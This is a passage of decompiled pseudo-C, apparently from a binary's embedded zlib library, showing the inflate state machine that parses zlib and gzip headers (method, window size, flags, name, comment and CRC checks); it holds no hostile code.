                                                                                                          													if((_t822 & 0x0000000f) == 8) {
                                                                                                          														L18:
                                                                                                          														_t822 = _t822 >> 4;
                                                                                                          														_t833 = _t833 - 4;
                                                                                                          														 *(_t841 - 0xc) = _t822;
                                                                                                          														 *(_t841 - 0x10) = _t833;
                                                                                                          														_t817 = (_t822 & 0x0000000f) + 8;
                                                                                                          														__eflags = _t800[9];
                                                                                                          														if(_t800[9] != 0) {
                                                                                                          															L22:
                                                                                                          															__eflags = _t817 - _t800[9];
                                                                                                          															if(_t817 <= _t800[9]) {
                                                                                                          																goto L20;
                                                                                                          															} else {
                                                                                                          																 *(_t837 + 0x18) = "invalid window size";
                                                                                                          																goto L17;
                                                                                                          															}
                                                                                                          														} else {
                                                                                                          															_t800[9] = _t817;
                                                                                                          															L20:
                                                                                                          															_t833 = 0;
                                                                                                          															_t800[5] = 1 << _t817;
                                                                                                          															_t787 = E00882E91(0, 0, 0);
                                                                                                          															_t800[6] = _t787;
                                                                                                          															 *(_t837 + 0x30) = _t787;
                                                                                                          															_t831 =  !( *(_t841 - 0xc) >> 8) & 0x00000002 | 0x00000009;
                                                                                                          															__eflags = _t831;
                                                                                                          															 *_t800 = _t831;
                                                                                                          															_t822 = 0;
                                                                                                          															goto L21;
                                                                                                          														}
                                                                                                          													} else {
                                                                                                          														 *(_t837 + 0x18) = "unknown compression method";
                                                                                                          														goto L17;
                                                                                                          													}
                                                                                                          												}
                                                                                                          												L9:
                                                                                                          												__eflags = _t822 - 0x8b1f;
                                                                                                          												if(_t822 != 0x8b1f) {
                                                                                                          													goto L11;
                                                                                                          												} else {
                                                                                                          													_t833 = 0;
                                                                                                          													_t800[6] = E008830C1(0, 0, 0);
                                                                                                          													_push(0x1f);
                                                                                                          													_pop(_t789);
                                                                                                          													 *((char*)(_t841 - 0x14)) = _t789;
                                                                                                          													 *((char*)(_t841 - 0x13)) = 0x8b;
                                                                                                          													_t791 = E008830C1(_t800[6], _t841 - 0x14, 2);
                                                                                                          													_t822 = 0;
                                                                                                          													_t800[6] = _t791;
                                                                                                          													 *(_t841 - 0xc) = 0;
                                                                                                          													 *(_t841 - 0x10) = 0;
                                                                                                          													 *_t800 = 1;
                                                                                                          													goto L134;
                                                                                                          												}
                                                                                                          											} else {
                                                                                                          												_t6 = _t841 - 8; // 0x38
                                                                                                          												_t792 =  *_t6;
                                                                                                          												while(1) {
                                                                                                          													L6:
                                                                                                          													__eflags = _t806;
                                                                                                          													if(_t806 == 0) {
                                                                                                          														goto L322;
                                                                                                          													}
                                                                                                          													L7:
                                                                                                          													 *(_t841 - 4) = _t806 - 1;
                                                                                                          													_t794 = ( *_t792 & 0x000000ff) << _t833;
                                                                                                          													_t833 = _t833 + 8;
                                                                                                          													_t806 =  *(_t841 - 4);
                                                                                                          													_t822 = _t822 + _t794;
                                                                                                          													_t9 = _t841 - 8; // 0x38
                                                                                                          													_t792 =  *_t9 + 1;
                                                                                                          													 *(_t841 - 0xc) = _t822;
                                                                                                          													 *(_t841 - 8) = _t792;
                                                                                                          													 *(_t841 - 0x10) = _t833;
                                                                                                          													__eflags = _t833 - 0x10;
                                                                                                          													if(_t833 < 0x10) {
                                                                                                          														continue;
                                                                                                          													}
                                                                                                          													goto L8;
                                                                                                          												}
                                                                                                          												goto L322;
                                                                                                          											}
                                                                                                          										} else {
                                                                                                          											 *_t800 = 0xc;
                                                                                                          											goto L135;
                                                                                                          										}
                                                                                                          									case 1:
                                                                                                          										L25:
                                                                                                          										_push(0x10);
                                                                                                          										_pop(__eax);
                                                                                                          										__eflags = __edi - __eax;
                                                                                                          										if(__edi >= __eax) {
                                                                                                          											L29:
                                                                                                          											 *(__ebx + 0x10) = __edx;
                                                                                                          											__eflags = __dl - 8;
                                                                                                          											if(__dl == 8) {
                                                                                                          												L32:
                                                                                                          												__eflags = __edx & 0x0000e000;
                                                                                                          												if((__edx & 0x0000e000) == 0) {
                                                                                                          													L34:
                                                                                                          													__ecx =  *(__ebx + 0x20);
                                                                                                          													__eflags = __ecx;
                                                                                                          													if(__ecx != 0) {
                                                                                                          														__edx = __edx >> 8;
                                                                                                          														__eax = __edx >> 0x00000008 & 0x00000001;
                                                                                                          														__eflags = __eax;
                                                                                                          														 *__ecx = __eax;
                                                                                                          													}
                                                                                                          													__eflags =  *(__ebx + 0x10) & 0x00000200;
                                                                                                          													if(( *(__ebx + 0x10) & 0x00000200) != 0) {
                                                                                                          														 *(__ebp - 0x14) = __dl;
                                                                                                          														__eax = __ebp - 0x14;
                                                                                                          														__eflags = __edx;
                                                                                                          														 *(__ebp - 0x13) = __dl;
                                                                                                          														 *(__ebx + 0x18) = E008830C1( *(__ebx + 0x18), __ebp - 0x14, 2);
                                                                                                          													}
                                                                                                          													__ecx =  *(__ebp - 4);
                                                                                                          													__eax = 0;
                                                                                                          													__eflags = 0;
                                                                                                          													__edx = 0;
                                                                                                          													 *__ebx = 2;
                                                                                                          													 *(__ebp - 0xc) = 0;
                                                                                                          													__edi = 0;
                                                                                                          													goto L39;
                                                                                                          												}
                                                                                                          												L33:
                                                                                                          												 *(__esi + 0x18) = "unknown header flags set";
                                                                                                          											} else {
                                                                                                          												 *(__esi + 0x18) = "unknown compression method";
                                                                                                          											}
                                                                                                          											goto L31;
                                                                                                          										} else {
                                                                                                          											_t51 = __ebp - 8; // 0x38
                                                                                                          											__eax =  *_t51;
                                                                                                          											while(1) {
                                                                                                          												L27:
                                                                                                          												__eflags = __ecx;
                                                                                                          												if(__ecx == 0) {
                                                                                                          													goto L322;
                                                                                                          												}
                                                                                                          												L28:
                                                                                                          												__eax =  *__eax & 0x000000ff;
                                                                                                          												 *(__ebp - 4) = __ecx;
                                                                                                          												__ecx = __edi;
                                                                                                          												__eax = __eax << __cl;
                                                                                                          												__edi = __edi + 8;
                                                                                                          												__ecx =  *(__ebp - 4);
                                                                                                          												__edx = __eax + __edx;
                                                                                                          												_t54 = __ebp - 8; // 0x38
                                                                                                          												__eax =  *_t54;
                                                                                                          												__eax =  *_t54 + 1;
                                                                                                          												 *(__ebp - 0xc) = __edx;
                                                                                                          												 *(__ebp - 8) = __eax;
                                                                                                          												 *(__ebp - 0x10) = __edi;
                                                                                                          												__eflags = __edi - 0x10;
                                                                                                          												if(__edi < 0x10) {
                                                                                                          													continue;
                                                                                                          												}
                                                                                                          												goto L29;
                                                                                                          											}
                                                                                                          											goto L322;
                                                                                                          										}
                                                                                                          									case 2:
                                                                                                          										L39:
                                                                                                          										__eflags = __edi - 0x20;
                                                                                                          										if(__edi >= 0x20) {
                                                                                                          											L43:
                                                                                                          											__eax =  *(__ebx + 0x20);
                                                                                                          											__eflags = __eax;
                                                                                                          											if(__eax != 0) {
                                                                                                          												 *(__eax + 4) = __edx;
                                                                                                          											}
                                                                                                          											__eflags =  *(__ebx + 0x10) & 0x00000200;
                                                                                                          											if(( *(__ebx + 0x10) & 0x00000200) != 0) {
                                                                                                          												__eax = __edx;
                                                                                                          												 *(__ebp - 0x14) = __dl;
                                                                                                          												__eax = __edx >> 8;
                                                                                                          												 *(__ebp - 0x13) = __al;
                                                                                                          												__edx = __edx >> 0x10;
                                                                                                          												 *(__ebp - 0x12) = __al;
                                                                                                          												__eax = __ebp - 0x14;
                                                                                                          												__eflags = __edx;
                                                                                                          												 *(__ebp - 0x11) = __dl;
                                                                                                          												 *(__ebx + 0x18) = E008830C1( *(__ebx + 0x18), __ebp - 0x14, 4);
                                                                                                          											}
                                                                                                          											__ecx =  *(__ebp - 4);
                                                                                                          											__eax = 0;
                                                                                                          											__eflags = 0;
                                                                                                          											__edx = 0;
                                                                                                          											 *__ebx = 3;
                                                                                                          											 *(__ebp - 0xc) = 0;
                                                                                                          											__edi = 0;
                                                                                                          											goto L48;
                                                                                                          										}
                                                                                                          										L40:
                                                                                                          										_t74 = __ebp - 8; // 0x38
                                                                                                          										__eax =  *_t74;
                                                                                                          										while(1) {
                                                                                                          											L41:
                                                                                                          											__eflags = __ecx;
                                                                                                          											if(__ecx == 0) {
                                                                                                          												goto L322;
                                                                                                          											}
                                                                                                          											L42:
                                                                                                          											__eax =  *__eax & 0x000000ff;
                                                                                                          											 *(__ebp - 4) = __ecx;
                                                                                                          											__ecx = __edi;
                                                                                                          											__eax = __eax << __cl;
                                                                                                          											__edi = __edi + 8;
                                                                                                          											__ecx =  *(__ebp - 4);
                                                                                                          											__edx = __eax + __edx;
                                                                                                          											_t77 = __ebp - 8; // 0x38
                                                                                                          											__eax =  *_t77;
                                                                                                          											__eax =  *_t77 + 1;
                                                                                                          											 *(__ebp - 0xc) = __edx;
                                                                                                          											 *(__ebp - 8) = __eax;
                                                                                                          											__eflags = __edi - 0x20;
                                                                                                          											if(__edi < 0x20) {
                                                                                                          												continue;
                                                                                                          											}
                                                                                                          											goto L43;
                                                                                                          										}
                                                                                                          										goto L322;
                                                                                                          									case 3:
                                                                                                          										L48:
                                                                                                          										_push(0x10);
                                                                                                          										_pop(__eax);
                                                                                                          										__eflags = __edi - __eax;
                                                                                                          										if(__edi >= __eax) {
                                                                                                          											L52:
                                                                                                          											__ecx =  *(__ebx + 0x20);
                                                                                                          											__eflags = __ecx;
                                                                                                          											if(__ecx != 0) {
                                                                                                          												__eax = __dl & 0x000000ff;
                                                                                                          												 *(__ecx + 8) = __dl & 0x000000ff;
                                                                                                          												__ecx = __edx;
                                                                                                          												__eax =  *(__ebx + 0x20);
                                                                                                          												__ecx = __edx >> 8;
                                                                                                          												__eflags = __ecx;
                                                                                                          												 *( *(__ebx + 0x20) + 0xc) = __ecx;
                                                                                                          											}
                                                                                                          											__eflags =  *(__ebx + 0x10) & 0x00000200;
                                                                                                          											if(( *(__ebx + 0x10) & 0x00000200) != 0) {
                                                                                                          												 *(__ebp - 0x14) = __dl;
                                                                                                          												__eax = __ebp - 0x14;
                                                                                                          												__eflags = __edx;
                                                                                                          												 *(__ebp - 0x13) = __dl;
                                                                                                          												 *(__ebx + 0x18) = E008830C1( *(__ebx + 0x18), __ebp - 0x14, 2);
                                                                                                          											}
                                                                                                          											__ecx =  *(__ebp - 4);
                                                                                                          											__eax = 0;
                                                                                                          											__eflags = 0;
                                                                                                          											__edx = 0;
                                                                                                          											 *__ebx = 4;
                                                                                                          											__edi = 0;
                                                                                                          											 *(__ebp - 0xc) = 0;
                                                                                                          											 *(__ebp - 0x10) = 0;
                                                                                                          											goto L57;
                                                                                                          										}
                                                                                                          										L49:
                                                                                                          										_t94 = __ebp - 8; // 0x38
                                                                                                          										__eax =  *_t94;
                                                                                                          										while(1) {
                                                                                                          											L50:
                                                                                                          											__eflags = __ecx;
                                                                                                          											if(__ecx == 0) {
                                                                                                          												goto L322;
                                                                                                          											}
                                                                                                          											L51:
                                                                                                          											__eax =  *__eax & 0x000000ff;
                                                                                                          											 *(__ebp - 4) = __ecx;
                                                                                                          											__ecx = __edi;
                                                                                                          											__eax = __eax << __cl;
                                                                                                          											__edi = __edi + 8;
                                                                                                          											__ecx =  *(__ebp - 4);
                                                                                                          											__edx = __eax + __edx;
                                                                                                          											_t97 = __ebp - 8; // 0x38
                                                                                                          											__eax =  *_t97;
                                                                                                          											__eax =  *_t97 + 1;
                                                                                                          											 *(__ebp - 0xc) = __edx;
                                                                                                          											 *(__ebp - 8) = __eax;
                                                                                                          											__eflags = __edi - 0x10;
                                                                                                          											if(__edi < 0x10) {
                                                                                                          												continue;
                                                                                                          											}
                                                                                                          											goto L52;
                                                                                                          										}
                                                                                                          										goto L322;
                                                                                                          									case 4:
                                                                                                          										L57:
                                                                                                          										__eflags =  *(__ebx + 0x10) & 0x00000400;
                                                                                                          										if(( *(__ebx + 0x10) & 0x00000400) == 0) {
                                                                                                          											L67:
                                                                                                          											__eax =  *(__ebx + 0x20);
                                                                                                          											__eflags = __eax;
                                                                                                          											if(__eax != 0) {
                                                                                                          												_t138 = __eax + 0x10;
                                                                                                          												 *_t138 =  *(__eax + 0x10) & 0x00000000;
                                                                                                          												__eflags =  *_t138;
                                                                                                          											}
                                                                                                          											L69:
                                                                                                          											 *__ebx = 5;
                                                                                                          											goto L70;
                                                                                                          										}
                                                                                                          										L58:
                                                                                                          										_push(0x10);
                                                                                                          										_pop(__eax);
                                                                                                          										__eflags = __edi - __eax;
                                                                                                          										if(__edi >= __eax) {
                                                                                                          											L62:
                                                                                                          											__eax =  *(__ebx + 0x20);
                                                                                                          											 *(__ebx + 0x40) = __edx;
                                                                                                          											__eflags = __eax;
                                                                                                          											if(__eax != 0) {
                                                                                                          												 *(__eax + 0x14) = __edx;
                                                                                                          											}
                                                                                                          											__eflags =  *(__ebx + 0x10) & 0x00000200;
                                                                                                          											if(( *(__ebx + 0x10) & 0x00000200) != 0) {
                                                                                                          												 *(__ebp - 0x14) = __dl;
                                                                                                          												__eax = __ebp - 0x14;
                                                                                                          												__eflags = __edx;
                                                                                                          												 *(__ebp - 0x13) = __dl;
                                                                                                          												 *(__ebx + 0x18) = E008830C1( *(__ebx + 0x18), __ebp - 0x14, 2);
                                                                                                          											}
                                                                                                          											__eax = 0;
                                                                                                          											__edi = 0;
                                                                                                          											 *(__ebp - 0xc) = 0;
                                                                                                          											 *(__ebp - 0x10) = 0;
                                                                                                          											goto L69;
                                                                                                          										}
                                                                                                          										L59:
                                                                                                          										_t118 = __ebp - 8; // 0x38
                                                                                                          										__eax =  *_t118;
                                                                                                          										while(1) {
                                                                                                          											L60:
                                                                                                          											__eflags = __ecx;
                                                                                                          											if(__ecx == 0) {
                                                                                                          												goto L322;
                                                                                                          											}
                                                                                                          											L61:
                                                                                                          											__eax =  *__eax & 0x000000ff;
                                                                                                          											 *(__ebp - 4) = __ecx;
                                                                                                          											__ecx = __edi;
                                                                                                          											__eax = __eax << __cl;
                                                                                                          											__edi = __edi + 8;
                                                                                                          											__ecx =  *(__ebp - 4);
                                                                                                          											__edx = __eax + __edx;
                                                                                                          											_t121 = __ebp - 8; // 0x38
                                                                                                          											__eax =  *_t121;
                                                                                                          											__eax =  *_t121 + 1;
                                                                                                          											 *(__ebp - 0xc) = __edx;
                                                                                                          											 *(__ebp - 8) = __eax;
                                                                                                          											__eflags = __edi - 0x10;
                                                                                                          											if(__edi < 0x10) {
                                                                                                          												continue;
                                                                                                          											}
                                                                                                          											goto L62;
                                                                                                          										}
                                                                                                          										goto L322;
                                                                                                          									case 5:
                                                                                                          										L70:
                                                                                                          										__eflags =  *(__ebx + 0x10) & 0x00000400;
                                                                                                          										if(( *(__ebx + 0x10) & 0x00000400) == 0) {
                                                                                                          											L83:
                                                                                                          											__edx = 0;
                                                                                                          											__eflags = 0;
                                                                                                          											L84:
                                                                                                          											__ecx =  *(__ebp - 4);
                                                                                                          											 *(__ebx + 0x40) = __edx;
                                                                                                          											 *__ebx = 6;
                                                                                                          											goto L86;
                                                                                                          										}
                                                                                                          										L71:
                                                                                                          										__ecx =  *(__ebx + 0x40);
                                                                                                          										__edx =  *(__ebp - 4);
                                                                                                          										__eflags = __ecx - __edx;
                                                                                                          										__ecx =  >  ? __edx : __ecx;
                                                                                                          										 *(__ebp - 0x30) = __ecx;
                                                                                                          										__eflags = __ecx;
                                                                                                          										if(__ecx != 0) {
                                                                                                          											__edx =  *(__ebx + 0x20);
                                                                                                          											__eflags = __edx;
                                                                                                          											if(__edx != 0) {
                                                                                                          												__eax =  *(__edx + 0x10);
                                                                                                          												 *(__ebp - 0x2c) = __eax;
                                                                                                          												__eflags = __eax;
                                                                                                          												if(__eax != 0) {
                                                                                                          													__eax =  *(__edx + 0x14);
                                                                                                          													__eax =  *(__edx + 0x14) -  *(__ebx + 0x40);
                                                                                                          													__edx =  *(__edx + 0x18);
                                                                                                          													 *(__ebp - 0x34) = __eax;
                                                                                                          													__eflags = __eax - __edx;
                                                                                                          													__eax =  *(__ebp - 0x34);
                                                                                                          													if(__eflags <= 0) {
                                                                                                          														__edx = __ecx;
                                                                                                          													} else {
                                                                                                          														__edx = __edx - __eax;
                                                                                                          													}
                                                                                                          													_t154 = __ebp - 8; // 0x38
                                                                                                          													__ecx =  *_t154;
                                                                                                          													__eax = __eax +  *(__ebp - 0x2c);
                                                                                                          													__eflags = __eax;
                                                                                                          													__eax = memcpy(__eax,  *_t154, __edx);
                                                                                                          													__ecx =  *(__ebp - 0x30);
                                                                                                          													__esp = __esp + 0xc;
                                                                                                          												}
                                                                                                          											}
                                                                                                          											__eflags =  *(__ebx + 0x10) & 0x00000200;
                                                                                                          											if(( *(__ebx + 0x10) & 0x00000200) != 0) {
                                                                                                          												_t160 = __ebp - 8; // 0x38
                                                                                                          												 *(__ebx + 0x18) = E008830C1( *(__ebx + 0x18),  *_t160, __ecx);
                                                                                                          											}
                                                                                                          											__eax =  *(__ebp - 0x30);
                                                                                                          											 *(__ebp - 4) =  *(__ebp - 4) - __eax;
                                                                                                          											 *(__ebp - 8) =  *(__ebp - 8) + __eax;
                                                                                                          											_t168 = __ebx + 0x40;
                                                                                                          											 *_t168 =  *(__ebx + 0x40) - __eax;
                                                                                                          											__eflags =  *_t168;
                                                                                                          										}
                                                                                                          										__edx = 0;
                                                                                                          										__eflags =  *(__ebx + 0x40);
                                                                                                          										if( *(__ebx + 0x40) != 0) {
                                                                                                          											goto L322;
                                                                                                          										} else {
                                                                                                          											L82:
                                                                                                          											goto L84;
                                                                                                          										}
                                                                                                          									case 6:
                                                                                                          										L85:
                                                                                                          										__edx = 0;
                                                                                                          										__eflags = 0;
                                                                                                          										L86:
                                                                                                          										__eflags =  *(__ebx + 0x10) & 0x00000800;
                                                                                                          										if(( *(__ebx + 0x10) & 0x00000800) == 0) {
                                                                                                          											L100:
                                                                                                          											__eax =  *(__ebx + 0x20);
                                                                                                          											__eflags = __eax;
                                                                                                          											if(__eax != 0) {
                                                                                                          												 *(__eax + 0x1c) = __edx;
                                                                                                          											}
                                                                                                          											L102:
                                                                                                          											__edx = 0;
                                                                                                          											 *__ebx = 7;
                                                                                                          											 *(__ebx + 0x40) = 0;
                                                                                                          											goto L104;
                                                                                                          										}
                                                                                                          										L87:
                                                                                                          										__eflags = __ecx;
                                                                                                          										if(__ecx == 0) {
                                                                                                          											goto L322;
                                                                                                          										}
                                                                                                          										L88:
                                                                                                          										__esi =  *(__ebp - 4);
                                                                                                          										__eax = __edx;
                                                                                                          										_t177 = __ebp - 8; // 0x38
                                                                                                          										__edx =  *_t177;
                                                                                                          										while(1) {
                                                                                                          											L89:
                                                                                                          											__ecx =  *(__eax + __edx) & 0x000000ff;
                                                                                                          											__eax = __eax + 1;
                                                                                                          											 *(__ebp - 0x2c) = __ecx;
                                                                                                          											__ecx =  *(__ebx + 0x20);
                                                                                                          											 *(__ebp - 0x34) = __eax;
                                                                                                          											__eflags = __ecx;
                                                                                                          											if(__ecx != 0) {
                                                                                                          												__edx =  *(0x1c + __ecx);
                                                                                                          												__eflags =  *(0x1c + __ecx);
                                                                                                          												if( *(0x1c + __ecx) != 0) {
                                                                                                          													__edx =  *(__ebx + 0x40);
                                                                                                          													__eflags = __edx -  *((intOrPtr*)(__ecx + 0x20));
                                                                                                          													if(__edx <  *((intOrPtr*)(__ecx + 0x20))) {
                                                                                                          														__ecx =  *(0x1c + __ecx);
                                                                                                          														__eax =  *(__ebp - 0x2c);
                                                                                                          														 *(__ecx + __edx) = __al;
                                                                                                          														_t188 = __ebx + 0x40;
                                                                                                          														 *_t188 =  *(__ebx + 0x40) + 1;
                                                                                                          														__eflags =  *_t188;
                                                                                                          														__eax =  *(__ebp - 0x34);
                                                                                                          													}
                                                                                                          												}
                                                                                                          												_t191 = __ebp - 8; // 0x38
                                                                                                          												__edx =  *_t191;
                                                                                                          											}
                                                                                                          											__eflags =  *(__ebp - 0x2c);
                                                                                                          											if( *(__ebp - 0x2c) == 0) {
                                                                                                          												break;
                                                                                                          											}
                                                                                                          											L95:
                                                                                                          											__eflags = __eax - __esi;
                                                                                                          											if(__eax < __esi) {
                                                                                                          												continue;
                                                                                                          											}
                                                                                                          											break;
                                                                                                          										}
                                                                                                          										L96:
                                                                                                          										__eflags =  *(__ebx + 0x10) & 0x00000200;
                                                                                                          										_t196 = __ebp + 8; // 0x38
                                                                                                          										__esi =  *_t196;
                                                                                                          										if(( *(__ebx + 0x10) & 0x00000200) != 0) {
                                                                                                          											 *(__ebx + 0x18) = __eax;
                                                                                                          											__eax =  *(__ebp - 0x34);
                                                                                                          										}
                                                                                                          										__ecx =  *(__ebp - 4);
                                                                                                          										 *(__ebp - 8) =  *(__ebp - 8) + __eax;
                                                                                                          										__ecx =  *(__ebp - 4) - __eax;
                                                                                                          										__eflags =  *(__ebp - 0x2c);
                                                                                                          										 *(__ebp - 4) = __ecx;
                                                                                                          										if( *(__ebp - 0x2c) != 0) {
                                                                                                          											goto L322;
                                                                                                          										} else {
                                                                                                          											L99:
                                                                                                          											goto L102;
                                                                                                          										}
                                                                                                          									case 7:
                                                                                                          										L103:
                                                                                                          										__edx = 0;
                                                                                                          										__eflags = 0;
                                                                                                          										L104:
                                                                                                          										__eflags =  *(__ebx + 0x10) & 0x00001000;
                                                                                                          										if(( *(__ebx + 0x10) & 0x00001000) == 0) {
                                                                                                          											L118:
                                                                                                          											__eax =  *(__ebx + 0x20);
                                                                                                          											__eflags = __eax;
                                                                                                          											if(__eax != 0) {
                                                                                                          												 *(__eax + 0x24) = __edx;
                                                                                                          											}
                                                                                                          											L120:
                                                                                                          											__edx =  *(__ebp - 0xc);
                                                                                                          											 *__ebx = 8;
                                                                                                          											goto L121;
                                                                                                          										}
                                                                                                          										L105:
                                                                                                          										__eflags = __ecx;
                                                                                                          										if(__ecx == 0) {
                                                                                                          											goto L322;
                                                                                                          										}
                                                                                                          										L106:
                                                                                                          										__esi =  *(__ebp - 4);
                                                                                                          										__eax = __edx;
                                                                                                          										_t212 = __ebp - 8; // 0x38
                                                                                                          										__edx =  *_t212;
                                                                                                          										while(1) {
                                                                                                          											L107:
                                                                                                          											__ecx =  *(__eax + __edx) & 0x000000ff;
                                                                                                          											__eax = __eax + 1;
                                                                                                          											 *(__ebp - 0x2c) = __ecx;
                                                                                                          											__ecx =  *(__ebx + 0x20);
                                                                                                          											 *(__ebp - 0x34) = __eax;
                                                                                                          											__eflags = __ecx;
                                                                                                          											if(__ecx != 0) {
                                                                                                          												__edx =  *(__ecx + 0x24);
                                                                                                          												__eflags =  *(__ecx + 0x24);
                                                                                                          												if( *(__ecx + 0x24) != 0) {
                                                                                                          													__edx =  *(__ebx + 0x40);
                                                                                                          													__eflags = __edx -  *((intOrPtr*)(__ecx + 0x28));
                                                                                                          													if(__edx <  *((intOrPtr*)(__ecx + 0x28))) {
                                                                                                          														__ecx =  *(__ecx + 0x24);
                                                                                                          														__eax =  *(__ebp - 0x2c);
                                                                                                          														 *(__ecx + __edx) = __al;
                                                                                                          														_t223 = __ebx + 0x40;
                                                                                                          														 *_t223 =  *(__ebx + 0x40) + 1;
                                                                                                          														__eflags =  *_t223;
                                                                                                          														__eax =  *(__ebp - 0x34);
                                                                                                          													}
                                                                                                          												}
                                                                                                          												_t226 = __ebp - 8; // 0x38
                                                                                                          												__edx =  *_t226;
                                                                                                          											}
                                                                                                          											__eflags =  *(__ebp - 0x2c);
                                                                                                          											if( *(__ebp - 0x2c) == 0) {
                                                                                                          												break;
                                                                                                          											}
                                                                                                          											L113:
                                                                                                          											__eflags = __eax - __esi;
                                                                                                          											if(__eax < __esi) {
                                                                                                          												continue;
                                                                                                          											}
                                                                                                          											break;
                                                                                                          										}
                                                                                                          										L114:
                                                                                                          										__eflags =  *(__ebx + 0x10) & 0x00000200;
                                                                                                          										_t231 = __ebp + 8; // 0x38
                                                                                                          										__esi =  *_t231;
                                                                                                          										if(( *(__ebx + 0x10) & 0x00000200) != 0) {
                                                                                                          											 *(__ebx + 0x18) = __eax;
                                                                                                          											__eax =  *(__ebp - 0x34);
                                                                                                          										}
                                                                                                          										__ecx =  *(__ebp - 4);
                                                                                                          										 *(__ebp - 8) =  *(__ebp - 8) + __eax;
                                                                                                          										__ecx =  *(__ebp - 4) - __eax;
                                                                                                          										__eflags =  *(__ebp - 0x2c);
                                                                                                          										 *(__ebp - 4) = __ecx;
                                                                                                          										if( *(__ebp - 0x2c) != 0) {
                                                                                                          											goto L322;
                                                                                                          										} else {
                                                                                                          											L117:
                                                                                                          											goto L120;
                                                                                                          										}
                                                                                                          									case 8:
                                                                                                          										L121:
                                                                                                          										__eflags =  *(__ebx + 0x10) & 0x00000200;
                                                                                                          										if(( *(__ebx + 0x10) & 0x00000200) == 0) {
                                                                                                          											L129:
                                                                                                          											__edx = 0;
                                                                                                          											__eflags = 0;
                                                                                                          											L130:
                                                                                                          											__ecx =  *(__ebx + 0x20);
                                                                                                          											__eflags = __ecx;
                                                                                                          											if(__ecx != 0) {
                                                                                                          												 *(__ebx + 0x10) =  *(__ebx + 0x10) >> 9;
                                                                                                          												__eax =  *(__ebx + 0x10) >> 0x00000009 & 0x00000001;
                                                                                                          												__eflags = __eax;
                                                                                                          												 *(__ecx + 0x2c) = __eax;
                                                                                                          												__eax =  *(__ebx + 0x20);
                                                                                                          												 *( *(__ebx + 0x20) + 0x30) = 1;
                                                                                                          											}
                                                                                                          											__eax = E008830C1(__edx, __edx, __edx);
                                                                                                          											 *(__ebx + 0x18) = __eax;
                                                                                                          											 *(__esi + 0x30) = __eax;
                                                                                                          											 *__ebx = 0xb;
                                                                                                          											goto L133;
                                                                                                          										}
                                                                                                          										L122:
                                                                                                          										_push(0x10);
                                                                                                          										_pop(__eax);
                                                                                                          										__eflags = __edi - __eax;
                                                                                                          										if(__edi >= __eax) {
                                                                                                          											L126:
                                                                                                          											__eax =  *(__ebx + 0x18) & 0x0000ffff;
                                                                                                          											__eflags = __edx - ( *(__ebx + 0x18) & 0x0000ffff);
                                                                                                          											if(__edx == ( *(__ebx + 0x18) & 0x0000ffff)) {
                                                                                                          												L128:
                                                                                                          												__edx = 0;
                                                                                                          												__edi = 0;
                                                                                                          												 *(__ebp - 0xc) = 0;
                                                                                                          												 *(__ebp - 0x10) = 0;
                                                                                                          												goto L130;
                                                                                                          											}
                                                                                                          											L127:
                                                                                                          											 *(__esi + 0x18) = "header crc mismatch";
                                                                                                          											goto L17;
                                                                                                          										}
                                                                                                          										L123:
                                                                                                          										_t246 = __ebp - 8; // 0x38
                                                                                                          										__eax =  *_t246;
                                                                                                          										while(1) {
                                                                                                          											L124:
                                                                                                          											__eflags = __ecx;
                                                                                                          											if(__ecx == 0) {
                                                                                                          												goto L322;
                                                                                                          											}
                                                                                                          											L125:
                                                                                                          											__eax =  *__eax & 0x000000ff;
                                                                                                          											 *(__ebp - 4) = __ecx;
                                                                                                          											__ecx = __edi;
                                                                                                          											__eax = __eax << __cl;
                                                                                                          											__edi = __edi + 8;
                                                                                                          											__ecx =  *(__ebp - 4);
                                                                                                          											__edx = __eax + __edx;
                                                                                                          											_t249 = __ebp - 8; // 0x38
                                                                                                          											__eax =  *_t249;
                                                                                                          											__eax =  *_t249 + 1;
                                                                                                          											 *(__ebp - 0xc) = __edx;
                                                                                                          											 *(__ebp - 8) = __eax;
                                                                                                          											 *(__ebp - 0x10) = __edi;
                                                                                                          											__eflags = __edi - 0x10;
                                                                                                          											if(__edi < 0x10) {
                                                                                                          												continue;
                                                                                                          											}
                                                                                                          											goto L126;
                                                                                                          										}
                                                                                                          										goto L322;
                                                                                                          									case 9:
                                                                                                          										L139:
                                                                                                          										__eflags = __edi - 0x20;
                                                                                                          										if(__edi >= 0x20) {
                                                                                                          											L143:
                                                                                                          											__ecx = __edx;
                                                                                                          											__edi = 0xff00;
                                                                                                          											__ecx = __edx & 0x0000ff00;
                                                                                                          											__edx = __edx << 0x10;
                                                                                                          											__ecx = (__edx & 0x0000ff00) + (__edx << 0x10);
                                                                                                          											__edx = __edx >> 8;
                                                                                                          											__eax = __edx >> 0x00000008 & 0x0000ff00;
                                                                                                          											__ecx = (__edx & 0x0000ff00) + (__edx << 0x10) << 8;
                                                                                                          											__eax = (__edx >> 0x00000008 & 0x0000ff00) + ((__edx & 0x0000ff00) + (__edx << 0x10) << 8);
                                                                                                          											__edx = __edx >> 0x18;
                                                                                                          											__ecx =  *(__ebp - 4);
                                                                                                          											__eax = __eax + __edx;
                                                                                                          											 *(__ebx + 0x18) = __eax;
                                                                                                          											 *(__esi + 0x30) = __eax;
                                                                                                          											__eax = 0;
                                                                                                          											__edx = 0;
                                                                                                          											 *__ebx = 0xa;
                                                                                                          											 *(__ebp - 0xc) = 0;
                                                                                                          											__edi = 0;
                                                                                                          											goto L145;
                                                                                                          										}
                                                                                                          										L140:
                                                                                                          										__eax =  *(__ebp - 8);
                                                                                                          										while(1) {
                                                                                                          											L141:
                                                                                                          											__eflags = __ecx;
                                                                                                          											if(__ecx == 0) {
                                                                                                          												goto L322;
                                                                                                          											}
                                                                                                          											L142:
                                                                                                          											__eax =  *__eax & 0x000000ff;
                                                                                                          											 *(__ebp - 4) = __ecx;
                                                                                                          											__ecx = __edi;
                                                                                                          											__eax = __eax << __cl;
                                                                                                          											__edi = __edi + 8;
                                                                                                          											__ecx =  *(__ebp - 4);
                                                                                                          											__edx = __eax + __edx;
                                                                                                          											__eax =  *(__ebp - 8);
                                                                                                          											__eax =  *(__ebp - 8) + 1;
                                                                                                          											 *(__ebp - 0xc) = __edx;
                                                                                                          											 *(__ebp - 8) = __eax;
                                                                                                          											__eflags = __edi - 0x20;
                                                                                                          											if(__edi < 0x20) {
                                                                                                          												continue;
                                                                                                          											}
                                                                                                          											goto L143;
                                                                                                          										}
                                                                                                          										goto L322;
                                                                                                          									case 0xa:
                                                                                                          										L144:
                                                                                                          										__eax = 0;
                                                                                                          										__eflags = 0;
                                                                                                          										L145:
